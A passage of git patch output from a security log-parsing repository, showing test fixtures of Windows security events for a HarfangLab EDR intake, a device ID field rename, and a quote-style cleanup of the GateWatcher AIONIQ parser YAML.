test\",\"CompatibleIds\":\"\",\"SubjectUserName\":\"TEST-MARRA03$\",\"SubjectDomainName\":\"TEST\",\"DeviceId\":\"HID\\\\VID_0000&PID_0000\\\\0&11111111&0&0000\",\"VendorIds\":\"HID\\\\VID_0000&PID_0000&EEV_0000\\t\\t\\t\\tHID\\\\VID_0000&PID_0000\",\"LocationInformation\":\"-\"},\"computer_name\":\"test_computer\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":11111,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"22222222-8888-9999-aaaa-333333333333\",\"user_data\":{},\"agent\":{\"agentid\":\"22222222-8888-9999-aaaa-333333333333\",\"osproducttype\":\"Windows 11 Pro\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.22631\",\"distroid\":null,\"hostname\":\"test_computer03\",\"dnsdomainname\":\"TEST.local\"},\"tenant\":\"ffAAAAAAFFFAAAADD\",\"record_number\":29888888}",
     "sekoiaio": {
       "intake": {
         "dialect": "HarfangLab EDR",
         "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2"
       }
-    },
-    "message": "{\"process_id\":4,\"groups\":[{\"name\":\"Poste_de_travail_testuser\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T23:45:01.905410588Z\",\"event_id\":6416,\"@event_create_date\":\"2024-09-26T21:59:58.346Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-1-1-11\",\"ClassName\":\"ClassnameTest\",\"SubjectLogonId\":\"0x3e7\",\"ClassId\":\"{4d36e96f-e325-11ce-bfc1-08002be10318}\",\"DeviceDescription\":\"Description test\",\"CompatibleIds\":\"\",\"SubjectUserName\":\"TEST-MARRA03$\",\"SubjectDomainName\":\"TEST\",\"DeviceId\":\"HID\\\\VID_0000&PID_0000\\\\0&11111111&0&0000\",\"VendorIds\":\"HID\\\\VID_0000&PID_0000&EEV_0000\\t\\t\\t\\tHID\\\\VID_0000&PID_0000\",\"LocationInformation\":\"-\"},\"computer_name\":\"test_computer\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":11111,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"22222222-8888-9999-aaaa-333333333333\",\"user_data\":{},\"agent\":{\"agentid\":\"22222222-8888-9999-aaaa-333333333333\",\"osproducttype\":\"Windows 11 Pro\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.22631\",\"distroid\":null,\"hostname\":\"test_computer03\",\"dnsdomainname\":\"TEST.local\"},\"tenant\":\"ffAAAAAAFFFAAAADD\",\"record_number\":29888888}"
+    }
   },
   "expected": {
     "message": "{\"process_id\":4,\"groups\":[{\"name\":\"Poste_de_travail_testuser\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T23:45:01.905410588Z\",\"event_id\":6416,\"@event_create_date\":\"2024-09-26T21:59:58.346Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-1-1-11\",\"ClassName\":\"ClassnameTest\",\"SubjectLogonId\":\"0x3e7\",\"ClassId\":\"{4d36e96f-e325-11ce-bfc1-08002be10318}\",\"DeviceDescription\":\"Description test\",\"CompatibleIds\":\"\",\"SubjectUserName\":\"TEST-MARRA03$\",\"SubjectDomainName\":\"TEST\",\"DeviceId\":\"HID\\\\VID_0000&PID_0000\\\\0&11111111&0&0000\",\"VendorIds\":\"HID\\\\VID_0000&PID_0000&EEV_0000\\t\\t\\t\\tHID\\\\VID_0000&PID_0000\",\"LocationInformation\":\"-\"},\"computer_name\":\"test_computer\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":11111,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"22222222-8888-9999-aaaa-333333333333\",\"user_data\":{},\"agent\":{\"agentid\":\"22222222-8888-9999-aaaa-333333333333\",\"osproducttype\":\"Windows 11 Pro\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.22631\",\"distroid\":null,\"hostname\":\"test_computer03\",\"dnsdomainname\":\"TEST.local\"},\"tenant\":\"ffAAAAAAFFFAAAADD\",\"record_number\":29888888}",
diff --git a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json
index 7927ea00f..6c2dee48d 100644
--- a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json
+++ b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"CN=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}",
     "sekoiaio": {
       "intake": {
         "dialect": "HarfangLab EDR",
         "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2"
       }
-    },
-    "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"CN=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}"
+    }
   },
   "expected": {
     "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"CN=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}",

From f1639997370cfb09df38b35c6de9c190e9c2df3c Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Tue, 1 Oct 2024 16:16:50 +0200
Subject: [PATCH 096/317] Change device ID field name

---
 HarfangLab/harfanglab/_meta/fields.yml                       | 5 +++++
 HarfangLab/harfanglab/ingest/parser.yml                      | 2 +-
 .../tests/test_detection_rules_missing_fields.json           | 4 +---
 3 files changed, 7 insertions(+), 4 deletions(-)

diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index 40d115641..611f3c079 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -138,6 +138,11 @@ action.properties.DetectionUser:
   name: action.properties.DetectionUser
   type: keyword
 
+action.properties.DeviceID:
+  description: ''
+  name: action.properties.DeviceID
+  type: keyword
+
 action.properties.Domain:
   description: ''
   name: action.properties.Domain
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 33437849b..6859ff3dc 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -283,7 +283,7 @@ stages:
           user.domain: "{{json_event.message.event_data.SubjectDomainName}}"
           user.target.name: "{{json_event.message.event_data.TargetUserName}}"
           user.target.domain: "{{json_event.message.event_data.TargetDomainName}}"
-          device.id: "{{json_event.message.event_data.DeviceId}}"
+          action.properties.DeviceID: "{{json_event.message.event_data.DeviceId}}"
           action.properties.ASsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AS security intelligence creation time')}}"
           action.properties.ASsecurityintelligenceversion: "{{json_event.message.event_data.get('AS security intelligence version')}}"
           action.properties.AVsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AV security intelligence creation time')}}"
diff --git a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
index 46d0a321b..be8ca3444 100644
--- a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
+++ b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
@@ -23,6 +23,7 @@
       "id": 6416,
       "properties": {
         "ClassName": "ClassnameTest",
+        "DeviceID": "HID\\VID_0000&PID_0000\\0&11111111&0&0000",
         "SubjectDomainName": "TEST",
         "SubjectLogonId": "0x3e7",
         "SubjectUserName": "TEST-MARRA03$",
@@ -33,9 +34,6 @@
       "id": "22222222-8888-9999-aaaa-333333333333",
       "name": "harfanglab"
     },
-    "device": {
-      "id": "HID\\VID_0000&PID_0000\\0&11111111&0&0000"
-    },
     "harfanglab": {
       "groups": [
         "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"Poste_de_travail_testuser\"}"

From 684ef2b0e49481ffaeadc5510313bf6389c66b15 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 1 Oct 2024 19:19:32 +0200
Subject: [PATCH 097/317] chore(GateWatcher): clean up the AIONIQ V103 parser

---
 GateWatcher/aioniq_ecs/ingest/parser.yml | 846 +++++++++--------------
 1 file changed, 326 insertions(+), 520 deletions(-)

diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml
index 42afcb85b..2c654e662 100644
--- a/GateWatcher/aioniq_ecs/ingest/parser.yml
+++ b/GateWatcher/aioniq_ecs/ingest/parser.yml
@@ -1,768 +1,574 @@
-name: gatewatcher-test-ecs---clem
+name: gatewatcher-aioniq-v103
 ignored_values: null
 pipeline:
   - name: json_load
-    description: ''
-    filter: ''
+    description: ""
     external:
       name: json.parse-json
       properties:
-        input_field: '{{original.message}}'
+        input_field: "{{original.message}}"
         output_field: message
   - name: parsed_date
     description: Parsed date
-    filter: ''
-    external: null
   - name: event
     description: event field
-    filter: ''
-    external: null
   - name: source
     description: source field
-    filter: ''
-    external: null
   - name: destination
     description: destination field
-    filter: ''
-    external: null
   - name: observer
     description: observer field
-    filter: ''
-    external: null
   - name: network
     description: network field
-    filter: ''
-    external: null
   - name: http
     description: http metadata fields
-    filter: ''
-    external: null
   - name: file
     description: file field
-    filter: ''
-    external: null
   - name: dns
     description: dns field metadata
-    filter: ''
-    external: null
   - name: url
     description: url field
-    filter: ''
-    external: null
   - name: ecs
     description: ecs field
-    filter: ''
-    external: null
   - name: user_agent
     description: user_agent field
-    filter: ''
-    external: null
   - name: version
-    description: '@version field'
-    filter: ''
-    external: null
+    description: "@version field"
   - name: tls
     description: tls field
-    filter: ''
-    external: null
   - name: metadata-flowbits
     description: metadata flowbits field
-    filter: ''
-    external: null
   - name: smtp
     description: smtp field
-    filter: ''
-    external: null
   - name: email
     description: email field
-    filter: ''
-    external: null
   - name: smb
     description: smb field
-    filter: ''
-    external: null
   - name: nfs
     description: nfs field
-    filter: ''
-    external: null
   - name: ftp
     description: ftp field
-    filter: ''
-    external: null
   - name: tftp
     description: tftp field
-    filter: ''
-    external: null
   - name: ssh
     description: ssh field
-    filter: ''
-    external: null
   - name: krb5
     description: krb5 field
-    filter: ''
-    external: null
   - name: dhcp
     description: dhcp field
-    filter: ''
-    external: null
   - name: ftp_data
     description: ftp_data field
-    filter: ''
-    external: null
   - name: snmp
     description: snmp field
-    filter: ''
-    external: null
   - name: rdp
     description: rdp field
-    filter: ''
-    external: null
   - name: rfb
     description: rfb field
-    filter: ''
-    external: null
   - name: ikev2
     description: ikev 2 field
-    filter: ''
-    external: null
   - name: sip
     description: sip field
-    filter: ''
-    external: null
   - name: dnp3
     description: dnp3 field
-    filter: ''
-    external: null
   - name: dcerpc
     description: dcerpc field
-    filter: ''
-    external: null
   - name: mqtt
     description: mqtt field
-    filter: ''
-    external: null
   - name: malcore
     description: malcore field
-    filter: ''
-    external: null
   - name: sigflow
     description: sigflow field
-    filter: ''
-    external: null
   - name: flow
     description: flow field
-    filter: ''
-    external: null
   - name: shellcode
     description: shellcode field
-    filter: ''
-    external: null
   - name: malicious_powershell
     description: malicious_powershell field
-    filter: ''
-    external: null
   - name: files
     description: files field
-    filter: ''
-    external: null
   - name: history
     description: history field
-    filter: ''
-    external: null
   - name: syslog
     description: syslog field
-    filter: ''
-    external: null
   - name: notification
     description: notification field
-    filter: ''
-    external: null
   - name: beacon
     description: beacon field
-    filter: ''
-    external: null
   - name: retrohunt
     description: retrohunt field
-    filter: ''
-    external: null
   - name: ransomware_detect
     description: ransomware_detect field
-    filter: ''
-    external: null
   - name: dga_detect
     description: dga_detect field
-    filter: ''
-    external: null
   - name: network_behavior_analytics
     description: network_behavior_analytics field
-    filter: ''
-    external: null
   - name: ioc
     description: ioc field
-    filter: ''
-    external: null
 stages:
   parsed_date:
     actions:
       - set:
-          '@timestamp': '{{json_load.message["@timestamp"]}}'
-        filter: ''
-        name: set
+          "@timestamp": '{{json_load.message["@timestamp"]}}'
   event:
     actions:
       - set:
-          event.kind: '{{json_load.message.event.kind}}'
-          event.module: '{{json_load.message.event.module}}'
-          event.dataset: '{{json_load.message.event.dataset}}'
-          event.category: '{{json_load.message.event.category}}'
-          event.severity: '{{json_load.message.event.severity}}'
-          gatewatcher.event.id: '{{json_load.message.event.id}}'
-          gatewatcher.event.created: '{{json_load.message.event.created}}'
-        filter: ''
-        name: set
+          event.kind: "{{json_load.message.event.kind}}"
+          event.module: "{{json_load.message.event.module}}"
+          event.dataset: "{{json_load.message.event.dataset}}"
+          event.category: "{{json_load.message.event.category}}"
+          event.severity: "{{json_load.message.event.severity}}"
+          gatewatcher.event.id: "{{json_load.message.event.id}}"
+          gatewatcher.event.created: "{{json_load.message.event.created}}"
   source:
     actions:
       - set:
-          source.ip: '{{json_load.message.source.ip}}'
-          source.mac: '{{json_load.message.source.mac}}'
-          source.port: '{{json_load.message.source.port}}'
-        filter: ''
-        name: set
+          source.ip: "{{json_load.message.source.ip}}"
+          source.mac: "{{json_load.message.source.mac}}"
+          source.port: "{{json_load.message.source.port}}"
   destination:
     actions:
       - set:
-          destination.ip: '{{json_load.message.destination.ip}}'
-          destination.mac: '{{json_load.message.destination.mac}}'
-          destination.port: '{{json_load.message.destination.port}}'
-        filter: ''
-        name: set
+          destination.ip: "{{json_load.message.destination.ip}}"
+          destination.mac: "{{json_load.message.destination.mac}}"
+          destination.port: "{{json_load.message.destination.port}}"
   observer:
     actions:
       - set:
-          observer.vendor: '{{json_load.message.observer.vendor}}'
-          observer.product: '{{json_load.message.observer.product}}'
-          observer.version: '{{json_load.message.observer.version}}'
-          observer.hostname: '{{json_load.message.observer.hostname}}'
-          gatewatcher.observer.uuid: '{{json_load.message.observer.uuid}}'
-          gatewatcher.observer.gcap.version: '{{json_load.message.observer.gcap.version}}'
-          gatewatcher.observer.gcap.hostname: '{{json_load.message.observer.gcap.hostname}}'
-          gatewatcher.observer.log_format_version: '{{json_load.message.observer.log_format_version}}'
-          gatewatcher.observer.gcap.ingress.interface.name: '{{json_load.message.observer.gcap.ingress.interface.name}}'
-        filter: ''
-        name: set
+          observer.vendor: "{{json_load.message.observer.vendor}}"
+          observer.product: "{{json_load.message.observer.product}}"
+          observer.version: "{{json_load.message.observer.version}}"
+          observer.hostname: "{{json_load.message.observer.hostname}}"
+          gatewatcher.observer.uuid: "{{json_load.message.observer.uuid}}"
+          gatewatcher.observer.gcap.version: "{{json_load.message.observer.gcap.version}}"
+          gatewatcher.observer.gcap.hostname: "{{json_load.message.observer.gcap.hostname}}"
+          gatewatcher.observer.log_format_version: "{{json_load.message.observer.log_format_version}}"
+          gatewatcher.observer.gcap.ingress.interface.name: "{{json_load.message.observer.gcap.ingress.interface.name}}"
   network:
     actions:
       - set:
-          network.vlan.id: '{{json_load.message.network.vlan.id}}'
-          network.protocol: '{{json_load.message.network.protocol}}'
-          network.transport: '{{json_load.message.network.transport}}'
-          network.vlan.name: '{{json_load.message.network.vlan.name}}'
-          network.community_id: '{{json_load.message.network.community_id}}'
-          gatewatcher.network.tx_id: '{{json_load.message.network.tx_id}}'
-          gatewatcher.network.flow_id: '{{json_load.message.network.flow_id}}'
-          gatewatcher.network.timestamp: '{{json_load.message.network.timestamp}}'
-        filter: ''
-        name: set
+          network.vlan.id: "{{json_load.message.network.vlan.id}}"
+          network.protocol: "{{json_load.message.network.protocol}}"
+          network.transport: "{{json_load.message.network.transport}}"
+          network.vlan.name: "{{json_load.message.network.vlan.name}}"
+          network.community_id: "{{json_load.message.network.community_id}}"
+          gatewatcher.network.tx_id: "{{json_load.message.network.tx_id}}"
+          gatewatcher.network.flow_id: "{{json_load.message.network.flow_id}}"
+          gatewatcher.network.timestamp: "{{json_load.message.network.timestamp}}"
   http:
     actions:
       - set:
-          http.version: '{{json_load.message.http.version}}'
-          http.request.method: '{{json_load.message.http.request.method}}'
-          http.response.bytes: '{{json_load.message.http.response.bytes}}'
-          gatewatcher.http.http2: '{{json_load.message.http.http2}}'
-          http.request.mime_type: '{{json_load.message.http.request.mime_type}}'
-          gatewatcher.http.accept: '{{json_load.message.http.accept}}'
-          http.response.mime_type: '{{json_load.message.http.response.mime_type}}'
-          gatewatcher.http.hostname: '{{json_load.message.http.hostname}}'
-          http.response.status_code: '{{json_load.message.http.response.status}}'
-          gatewatcher.http.http_refer: '{{json_load.message.http.http_refer}}'
-          gatewatcher.http.accept_language: '{{json_load.message.http.accept_language}}'
-        filter: ''
-        name: set
+          http.version: "{{json_load.message.http.version}}"
+          http.request.method: "{{json_load.message.http.request.method}}"
+          http.response.bytes: "{{json_load.message.http.response.bytes}}"
+          gatewatcher.http.http2: "{{json_load.message.http.http2}}"
+          http.request.mime_type: "{{json_load.message.http.request.mime_type}}"
+          gatewatcher.http.accept: "{{json_load.message.http.accept}}"
+          http.response.mime_type: "{{json_load.message.http.response.mime_type}}"
+          gatewatcher.http.hostname: "{{json_load.message.http.hostname}}"
+          http.response.status_code: "{{json_load.message.http.response.status}}"
+          gatewatcher.http.http_refer: "{{json_load.message.http.http_refer}}"
+          gatewatcher.http.accept_language: "{{json_load.message.http.accept_language}}"
   file:
     actions:
       - set:
-          file.name: '{{json_load.message.file.name}}'
-          file.size: '{{json_load.message.file.size}}'
-          file.hash.md5: '{{json_load.message.file.hash.md5}}'
-          file.hash.sha1: '{{json_load.message.file.hash.sha1}}'
-          file.hash.sha256: '{{json_load.message.file.hash.sha256}}'
-          gatewatcher.file.sid: '{{json_load.message.file.sid}}'
-          gatewatcher.file.gaps: '{{json_load.message.file.gaps}}'
-          gatewatcher.file.magic: '{{json_load.message.file.magic}}'
-          gatewatcher.file.state: '{{json_load.message.file.state}}'
-          gatewatcher.file.tx_id: '{{json_load.message.file.tx_id}}'
-          gatewatcher.file.stored: '{{json_load.message.file.stored}}'
-          gatewatcher.file.file_id: '{{json_load.message.file.file_id}}'
-        filter: ''
-        name: set
+          file.name: "{{json_load.message.file.name}}"
+          file.size: "{{json_load.message.file.size}}"
+          file.hash.md5: "{{json_load.message.file.hash.md5}}"
+          file.hash.sha1: "{{json_load.message.file.hash.sha1}}"
+          file.hash.sha256: "{{json_load.message.file.hash.sha256}}"
+          gatewatcher.file.sid: "{{json_load.message.file.sid}}"
+          gatewatcher.file.gaps: "{{json_load.message.file.gaps}}"
+          gatewatcher.file.magic: "{{json_load.message.file.magic}}"
+          gatewatcher.file.state: "{{json_load.message.file.state}}"
+          gatewatcher.file.tx_id: "{{json_load.message.file.tx_id}}"
+          gatewatcher.file.stored: "{{json_load.message.file.stored}}"
+          gatewatcher.file.file_id: "{{json_load.message.file.file_id}}"
   dns:
     actions:
       - set:
-          gatewatcher.dns: '{{json_load.message.dns}}'
-          dns.answers.data: '{{json_load.message.dns.answers.data}}'
-          dns.answers.type: '{{json_load.message.dns.answers.type}}'
-          dns.response_code: '{{json_load.message.dns.response_code}}'
-        filter: ''
-        name: set
+          gatewatcher.dns: "{{json_load.message.dns}}"
+          dns.answers.data: "{{json_load.message.dns.answers.data}}"
+          dns.answers.type: "{{json_load.message.dns.answers.type}}"
+          dns.response_code: "{{json_load.message.dns.response_code}}"
   url:
     actions:
       - set:
-          url.full: '{{json_load.message.url.full}}'
-          url.path: '{{json_load.message.url.path}}'
-          url.domain: '{{json_load.message.url.domain}}'
-        filter: ''
-        name: set
+          url.full: "{{json_load.message.url.full}}"
+          url.path: "{{json_load.message.url.path}}"
+          url.domain: "{{json_load.message.url.domain}}"
   ecs:
     actions:
       - set:
-          ecs.version: '{{json_load.message.ecs.version}}'
-        filter: ''
-        name: set
+          ecs.version: "{{json_load.message.ecs.version}}"
   user_agent:
     actions:
       - set:
-          user_agent.name: '{{json_load.message.user_agent.name}}'
-          user_agent.os.name: '{{json_load.message.user_agent.os.name}}'
-          user_agent.version: '{{json_load.message.user_agent.version}}'
-          user_agent.original: '{{json_load.message.user_agent.original}}'
-          user_agent.os.family: '{{json_load.message.user_agent.os.family}}'
-          user_agent.os.version: '{{json_load.message.user_agent.os.version}}'
-          user_agent.device.name: '{{json_load.message.user_agent.device.name}}'
-          gatewatcher.user_agent.major: '{{json_load.message.user_agent.major}}'
-          gatewatcher.user_agent.minor: '{{json_load.message.user_agent.minor}}'
-          gatewatcher.user_agent.patch: '{{json_load.message.user_agent.patch}}'
-          gatewatcher.user_agent.os.major: '{{json_load.message.user_agent.os.major}}'
-        filter: ''
-        name: set
+          user_agent.name: "{{json_load.message.user_agent.name}}"
+          user_agent.os.name: "{{json_load.message.user_agent.os.name}}"
+          user_agent.version: "{{json_load.message.user_agent.version}}"
+          user_agent.original: "{{json_load.message.user_agent.original}}"
+          user_agent.os.family: "{{json_load.message.user_agent.os.family}}"
+          user_agent.os.version: "{{json_load.message.user_agent.os.version}}"
+          user_agent.device.name: "{{json_load.message.user_agent.device.name}}"
+          gatewatcher.user_agent.major: "{{json_load.message.user_agent.major}}"
+          gatewatcher.user_agent.minor: "{{json_load.message.user_agent.minor}}"
+          gatewatcher.user_agent.patch: "{{json_load.message.user_agent.patch}}"
+          gatewatcher.user_agent.os.major: "{{json_load.message.user_agent.os.major}}"
   version:
     actions:
       - set:
           gatewatcher.version: '{{json_load.message["@version"]}}'
-        filter: ''
-        name: set
   tls:
     actions:
       - set:
-          tls.version: '{{json_load.message.tls.version}}'
-          gatewatcher.tls: '{{json_load.message.tls}}'
-          tls.server.issuer: '{{json_load.message.tls.server.issuer}}'
-          tls.server.subject: '{{json_load.message.tls.server.subject}}'
-          tls.server.hash.md5: '{{json_load.message.tls.server.hash.md5}}'
-          tls.server.hash.sha1: '{{json_load.message.tls.server.hash.sha1}}'
-          tls.client.server_name: '{{json_load.message.tls.client.server_name}}'
-          tls.server.certificate: '{{json_load.message.tls.server.certificate}}'
-          tls.server.hash.sha256: '{{json_load.message.tls.server.hash.sha256}}'
-          tls.server.certificate_chain: '{{json_load.message.tls.server.certificate.chain}}'
-        filter: ''
-        name: set
+          tls.version: "{{json_load.message.tls.version}}"
+          gatewatcher.tls: "{{json_load.message.tls}}"
+          tls.server.issuer: "{{json_load.message.tls.server.issuer}}"
+          tls.server.subject: "{{json_load.message.tls.server.subject}}"
+          tls.server.hash.md5: "{{json_load.message.tls.server.hash.md5}}"
+          tls.server.hash.sha1: "{{json_load.message.tls.server.hash.sha1}}"
+          tls.client.server_name: "{{json_load.message.tls.client.server_name}}"
+          tls.server.certificate: "{{json_load.message.tls.server.certificate}}"
+          tls.server.hash.sha256: "{{json_load.message.tls.server.hash.sha256}}"
+          tls.server.certificate_chain: "{{json_load.message.tls.server.certificate.chain}}"
   metadata-flowbits:
     actions:
       - set:
-          gatewatcher.metadata.flowbits: '{{json_load.message.metadata.flowbits}}'
-        filter: ''
-        name: set
+          gatewatcher.metadata.flowbits: "{{json_load.message.metadata.flowbits}}"
   smtp:
     actions:
       - set:
-          gatewatcher.smtp.helo: '{{json_load.message.smtp.helo}}'
-          gatewatcher.smtp.rcpt_to: '{{json_load.message.smtp.rcpt_to}}'
-          gatewatcher.smtp.mail_from: '{{json_load.message.smtp.mail_from}}'
-        filter: ''
-        name: set
+          gatewatcher.smtp.helo: "{{json_load.message.smtp.helo}}"
